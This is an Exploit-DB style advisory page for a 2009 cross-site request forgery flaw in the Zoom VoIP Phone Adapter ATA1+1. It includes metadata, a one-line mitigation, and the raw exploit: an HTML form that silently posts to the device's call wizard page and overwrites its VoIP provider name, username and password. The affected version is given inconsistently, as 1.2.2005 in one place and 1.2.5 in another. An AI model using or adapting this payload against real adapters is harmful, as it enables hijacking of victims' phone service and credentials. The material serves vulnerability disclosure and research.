Zoom VoIP Phone Adapater ATA1+1 XSRF

vendor:

VoIP Phone Adapter ATA1+1

by:

Michael Brooks

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: VoIP Phone Adapter ATA1+1

Affected Version From: 1.2.2005

Affected Version To: 1.2.2005

Patch Exists: NO

Related CWE: N/A

CPE: h:zoom:ata1+1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Zoom VoIP Phone Adapater ATA1+1 XSRF

This exploit allows an attacker to change the VoIP provider settings of the Zoom VoIP Phone Adapter ATA1+1. The attacker can change the VoIP provider settings by sending a malicious POST request to the vulnerable device. This exploit was tested on version 1.2.5 of the Zoom VoIP Phone Adapter ATA1+1.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the device is not exposed to the public internet and is only accessible from trusted networks.

Source

Exploit-DB raw data:

Written By Michael Brooks
Special thanks to str0ke!

Zoom VoIP Phone Adapater ATA1+1  XSRF
voip provider change xsrf
version 1.2.5
<html>
	<form action="http://10.1.1.165/callwzd.html" method=post>
		<input name=DIRTY_PAGE value=3>
		<input name=HELP_PAGE value=html.html>
		<input name=_voip_provider_1___provider_type value=1>
		<input name=_voip_provider_1___provider_name value=hacked_again>
		<input name=_voip_provider_1___display_name value=hacked_again>
		<input name=_voip_provider_1___user_name value=hacked_again>
		<input name=_voip_provider_1___auth_user_name value=hacked_again>
		<input name=_voip_provider_1___auth_user_password value=hacked_again>
		<input name=ipbx_fxo_local_areacode value=hacked_again>
		<input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
		<input name=ipbx_fxo_autodial_digit_leng value=6>
		<input name=BUTTON_FLASH value="Save+These+Settings">
		<input type=submit>
	</form>
</html>	

# milw0rm.com [2009-01-29]